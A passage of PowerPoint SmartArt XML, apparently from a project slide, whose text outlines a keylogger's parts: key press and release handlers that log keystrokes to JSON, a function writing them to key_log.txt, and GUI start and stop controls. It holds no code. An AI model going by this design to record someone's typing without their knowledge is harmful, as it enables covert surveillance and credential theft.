      <dgm:prSet presAssocID="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3BAAE64C-0C0C-436C-B4D1-CB1DBB24D5DB}" type="pres">
      <dgm:prSet presAssocID="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}"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dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{D504A9FC-FFC3-440F-9C33-7A97BFB08F7A}" type="pres">
      <dgm:prSet presAssocID="{EC732255-80CD-41DF-A38B-22FBD153AD66}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" type="pres">
      <dgm:prSet presAssocID="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" type="pres">
      <dgm:prSet presAssocID="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custLinFactNeighborX="4705" custLinFactNeighborY="1621"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" type="pres">
      <dgm:prSet presAssocID="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82A9693F-7758-426F-A041-276AEE05163C}" type="pres">
      <dgm:prSet presAssocID="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{76A8BCAD-F926-456C-847F-7C01C78E402B}" type="pres">
      <dgm:prSet presAssocID="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}"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Lst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{71DBD705-2839-442D-B310-15A8709FFCB4}" srcId="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" destId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" srcOrd="2" destOrd="0" parTransId="{8F1593AF-3B86-453C-971E-A5709C5A6A39}" sibTransId="{5A11D2D5-4A8F-4414-B315-3B7EF03B8A4D}"/>
    <dgm:cxn modelId="{580F130A-6794-4E4A-8337-6C12D1982BD1}" type="presOf" srcId="{12AD88A9-497E-481F-8B6D-31CAAD572DC6}" destId="{A9D64408-CF09-4222-A018-74CA13DACEC9}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{3C443F0C-3222-4F81-B0E3-FB82A96EBD41}" srcId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" destId="{17555B28-C959-41A3-AF3F-DE8C8AF52CB1}" srcOrd="0" destOrd="0" parTransId="{1840D8D3-28C9-45CE-8A44-CEB4761F5F28}" sibTransId="{7C1CCA8F-07AA-440D-A8A4-B20C3E87CC83}"/>
    <dgm:cxn modelId="{4BAD9922-F465-4AC9-8904-A3E2168AB85A}" type="presOf" srcId="{749D3DA5-0642-44D9-9AFE-5B180B73E639}" destId="{9294B1DA-B631-463F-89D9-B2F519C3513B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{B1A92523-857A-42CA-A0FB-6C8CCCE95FE9}" type="presOf" srcId="{C6B71EEC-D880-4100-B878-BD3A0B6FF7B2}" destId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{F1430C24-4E24-4097-A905-287D8915265E}" type="presOf" srcId="{33668DFE-79D4-4705-8FD8-931167E899E4}" destId="{BCF7B15A-721B-468A-82AE-D533A5DC693B}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{C8AE6530-C5D2-434B-9C3B-289BE5B25144}" srcId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" destId="{7ACBF37F-B181-4B7F-BA67-F1108A286FF2}" srcOrd="1" destOrd="0" parTransId="{1EEAC72C-D380-41A1-BF60-F6267D2F7C2F}" sibTransId="{4EDF53F1-1AAB-4730-8D79-376004E5C59B}"/>
    <dgm:cxn modelId="{04829E30-A5B4-4458-97C4-D4C963E1F8D4}" srcId="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" destId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" srcOrd="0" destOrd="0" parTransId="{2BF4CB66-56A2-4BA5-82D7-38F812236420}" sibTransId="{749D3DA5-0642-44D9-9AFE-5B180B73E639}"/>
    <dgm:cxn modelId="{432E5461-9B81-4218-AA1B-07A47CF5EB37}" srcId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" destId="{12AD88A9-497E-481F-8B6D-31CAAD572DC6}" srcOrd="0" destOrd="0" parTransId="{AA488877-DA8E-4703-9FF8-8686DA823883}" sibTransId="{BAF11084-F91F-454D-95B8-A943052F3EA4}"/>
    <dgm:cxn modelId="{FDD6DC61-7758-4433-8CA6-5077CE045B4C}" type="presOf" srcId="{C6B71EEC-D880-4100-B878-BD3A0B6FF7B2}" destId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" srcOrd="1" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{EF28BC45-8BFE-40D0-987D-E8A3521D9FE9}" type="presOf" srcId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" destId="{A9D64408-CF09-4222-A018-74CA13DACEC9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{3A3B3549-C725-464E-BEB4-909188BA94CF}" srcId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" destId="{C6B71EEC-D880-4100-B878-BD3A0B6FF7B2}" srcOrd="2" destOrd="0" parTransId="{B9553BAD-2274-4EEC-9E6E-6E42732F8E33}" sibTransId="{B6B91B7A-C62D-4AB5-814F-D1400CA099A6}"/>
    <dgm:cxn modelId="{58E0006E-9EB1-4C66-986B-FAE88D1A6F4A}" type="presOf" srcId="{17555B28-C959-41A3-AF3F-DE8C8AF52CB1}" destId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{910A054E-6509-4A1A-8F24-4AA9427ED03C}" srcId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" destId="{20FCF9A6-7D24-4220-B35A-D2E49116DE91}" srcOrd="1" destOrd="0" parTransId="{A5771A1A-7953-478A-A192-786F517A6902}" sibTransId="{CF4AA76E-9D15-4E36-8B87-8234DDF8653D}"/>
    <dgm:cxn modelId="{FD587376-039A-4004-8178-639379497DE5}" type="presOf" srcId="{20FCF9A6-7D24-4220-B35A-D2E49116DE91}" destId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{52A8E777-3038-4171-BA31-ED92FA3C1DA0}" srcId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" destId="{7536AB6E-3BB2-4D1F-A318-0ECDA724FEE2}" srcOrd="1" destOrd="0" parTransId="{A9ED6A5C-EFED-45CA-A84F-1C980075855A}" sibTransId="{5FAD7DE8-FE34-4353-B352-BC90F951BBA0}"/>
    <dgm:cxn modelId="{8D052659-ABA7-48DF-BECE-8C5DFB1D131B}" type="presOf" srcId="{33668DFE-79D4-4705-8FD8-931167E899E4}" destId="{3EE018A5-4DD7-4393-932E-B2CCAEC7B57A}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{5BE1E97C-BF31-47CB-A03E-7FA7C710B459}" type="presOf" srcId="{EC732255-80CD-41DF-A38B-22FBD153AD66}" destId="{D504A9FC-FFC3-440F-9C33-7A97BFB08F7A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{0FDE3F80-F10C-46AC-8F7B-DAB7C71D68A3}" type="presOf" srcId="{7536AB6E-3BB2-4D1F-A318-0ECDA724FEE2}" destId="{B3AB0F58-A88E-49C8-B3F6-DE1819888600}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{0A039A8D-8895-480F-B158-D26F924ECF20}" type="presOf" srcId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" destId="{BCF7B15A-721B-468A-82AE-D533A5DC693B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{F639ED98-22C7-4107-BB42-2E475CFA778F}" type="presOf" srcId="{12AD88A9-497E-481F-8B6D-31CAAD572DC6}" destId="{B3AB0F58-A88E-49C8-B3F6-DE1819888600}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{45252B9A-2653-409B-8210-3E34D411AE86}" type="presOf" srcId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" destId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{A983739F-56C2-4130-AACE-8EACD9F63289}" type="presOf" srcId="{7536AB6E-3BB2-4D1F-A318-0ECDA724FEE2}" destId="{A9D64408-CF09-4222-A018-74CA13DACEC9}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{FA4E2AAF-5FEA-47E3-9490-2DCAFCA59C7C}" type="presOf" srcId="{7ACBF37F-B181-4B7F-BA67-F1108A286FF2}" destId="{BCF7B15A-721B-468A-82AE-D533A5DC693B}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{C40515B6-8EE3-4B3D-BD82-5680A19FD302}" type="presOf" srcId="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" destId="{2DEF037C-FCBC-4968-8920-E469C6F74F78}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{0A9F42CB-21DE-4C5E-AAA3-9A01D8BCB6AE}" srcId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" destId="{33668DFE-79D4-4705-8FD8-931167E899E4}" srcOrd="0" destOrd="0" parTransId="{38D3A2B4-0AA3-4C89-AE00-F958CFF699C8}" sibTransId="{74BB7AB8-3877-4006-8ABF-5C4E57D38899}"/>
    <dgm:cxn modelId="{2C894CCB-32D1-472F-A1AD-6E511A74AA67}" srcId="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" destId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" srcOrd="1" destOrd="0" parTransId="{5DE7DF5D-0521-4B52-BC2B-602FB60E5B01}" sibTransId="{EC732255-80CD-41DF-A38B-22FBD153AD66}"/>
    <dgm:cxn modelId="{8CAE00CC-ACCB-4EAF-9C19-2EE07CC9E1FE}" type="presOf" srcId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}" destId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{8D0E5DCD-CE31-4BDE-9434-1470338329C0}" type="presOf" srcId="{20FCF9A6-7D24-4220-B35A-D2E49116DE91}" destId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{82A253E7-D257-44ED-AF72-C3EF7E61B11E}" type="presOf" srcId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" destId="{3EE018A5-4DD7-4393-932E-B2CCAEC7B57A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{5E8481F2-CF37-4885-A180-53C83A51F73C}" type="presOf" srcId="{17555B28-C959-41A3-AF3F-DE8C8AF52CB1}" destId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{A06A3BF7-182A-4302-9805-C545CE393C95}" type="presOf" srcId="{7ACBF37F-B181-4B7F-BA67-F1108A286FF2}" destId="{3EE018A5-4DD7-4393-932E-B2CCAEC7B57A}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{6110A3FE-825C-4398-A41D-94F59F2B2624}" type="presOf" srcId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" destId="{B3AB0F58-A88E-49C8-B3F6-DE1819888600}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{F181545C-9C7D-4344-86D0-BF690D5B46D2}" type="presParOf" srcId="{2DEF037C-FCBC-4968-8920-E469C6F74F78}" destId="{628F9F94-476C-48F1-94BE-EC3D86C96236}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{A8809FF2-B48B-48D0-89F4-D8C4A413D0CE}" type="presParOf" srcId="{2DEF037C-FCBC-4968-8920-E469C6F74F78}" destId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{00FBE5FF-F9BC-44A0-94E3-DE7D98310850}" type="presParOf" srcId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" destId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{FF2679D4-E575-496F-AC23-163BEBBC7C11}" type="presParOf" srcId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" destId="{A9D64408-CF09-4222-A018-74CA13DACEC9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{E38710A2-DD72-4CD0-8EF1-D2AF68435231}" type="presParOf" srcId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" destId="{B3AB0F58-A88E-49C8-B3F6-DE1819888600}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{20B68BBE-71C8-46FB-A7EE-DB5DAC64B7C7}" type="presParOf" srcId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" destId="{D434F777-8A96-4906-AE04-DDCDEDF531E5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{15AB0564-210B-47E3-97CC-7D7D0519CD6A}" type="presParOf" srcId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" destId="{C8CB6295-04BE-4EA4-9F6A-BF9482E09C6C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{48EDE726-1EE7-4321-8D7A-1F6F5755BC04}" type="presParOf" srcId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" destId="{9294B1DA-B631-463F-89D9-B2F519C3513B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{308674EF-137F-4124-A257-3057945D9516}" type="presParOf" srcId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" destId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{6D56C07F-6C34-497D-A0FB-9C8BFC919C57}" type="presParOf" srcId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" destId="{BCF7B15A-721B-468A-82AE-D533A5DC693B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{D93E30DB-61FC-4056-A5EC-FE2EC1476CD6}" type="presParOf" srcId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" destId="{3EE018A5-4DD7-4393-932E-B2CCAEC7B57A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{249DB380-6522-4162-86C2-18AD16D04E16}" type="presParOf" srcId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" destId="{40F76B6B-014D-43CA-ACAB-79F1C2E44FF8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{B98180D6-20FB-4A0F-9BD2-E2275914579A}" type="presParOf" srcId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" destId="{3BAAE64C-0C0C-436C-B4D1-CB1DBB24D5DB}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{4980EC5C-752E-4ED2-AA3B-1E0B7D353B61}" type="presParOf" srcId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" destId="{D504A9FC-FFC3-440F-9C33-7A97BFB08F7A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{2B5B96CB-3E55-4B20-918D-3DBC72860866}" type="presParOf" srcId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" destId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{22567FA1-853D-4370-850E-F8AA849118BC}" type="presParOf" srcId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" destId="{97734C01-2287-493B-9F67-D1D31C1B37A9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{FF94965E-0BB5-4777-BB95-6959DF32F41F}" type="presParOf" srcId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" destId="{3D100879-F3D4-4F8C-859E-6404CDC0F76F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{3596E80F-81DE-42A4-84BC-0BF3E5D27295}" type="presParOf" srcId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" destId="{82A9693F-7758-426F-A041-276AEE05163C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1"/>
    <dgm:cxn modelId="{CDB10CC5-8E20-48A5-9C44-CCBEFC272407}" type="presParOf" srcId="{6B9AEAD1-14A4-4F74-B604-77CC23DE93EC}" destId="{76A8BCAD-F926-456C-847F-7C01C78E402B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#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92B9A2-91CA-4167-81C3-2B08981ECB5A}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1#2" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2#2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FF0066"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>4.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Keyboard Event Handlers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>on_press(key): Logs the key press and hold events, updates keys_used, and generates the JSON file</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>on_release(key): Logs the key release event, updates keys_used, generates the JSON file, and updates the text log.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US" sz="700" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB80902E-7F97-447D-88D8-04D08CF237FE}" type="parTrans" cxnId="{16CF1C6B-FA85-4579-9194-0DF6BFD707A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EFBA6A7-6719-4CEB-A90C-D211AC498AD8}" type="sibTrans" cxnId="{16CF1C6B-FA85-4579-9194-0DF6BFD707A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2622105B-354A-455E-8C1C-5479F85199D2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>6.GUI </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Functions</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>start_keylogger(): Starts the keylogger and updates the GUI status.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Stop_keylogger(): Stops the keylogger and  updates the GUI  status.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US" sz="700" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US" sz="700" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US" sz="700" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{463513E4-F8BB-48E9-AB1F-39E799C65CBF}" type="parTrans" cxnId="{0E768EA6-B87F-4751-A314-81CE43522BD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4108A579-E36E-401E-895A-F89E345D79AE}" type="sibTrans" cxnId="{0E768EA6-B87F-4751-A314-81CE43522BD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>5.File Handling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>generate_text_log(key): Writes the accumulated keystrokes to key_log.txt.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0">
